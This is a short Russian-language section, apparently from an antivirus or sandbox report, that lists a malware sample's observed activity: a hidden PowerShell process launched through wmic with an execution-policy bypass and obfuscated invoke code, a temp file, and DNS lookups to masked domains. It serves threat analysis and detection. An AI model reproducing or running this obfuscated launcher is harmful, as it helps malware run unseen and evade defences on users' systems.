Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' PrOCeSS "CALL" CREaTE "powerShelL -Ep BYpass -w 0000000000000000000000000000000000000000000000000000000000000000000000000001 -NoNI -NoPR "\". ( `$verboSEPREFEReNCe.ToStRinG()[1"\" + [ST...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 964
- %TEMP%\1177765.cvr
- DNS ASK me###anos.com
- DNS ASK me###gnos.com
- '<SYSTEM32>\wbem\wmic.exe' PrOCeSS "CALL" CREaTE "powerShelL -Ep BYpass -w 0000000000000000000000000000000000000000000000000000000000000000000000000001 -NoNI -NoPR "\". ( `$verboSEPREFEReNCe.ToStRinG()[1"\" + [ST...' (со скрытым окном)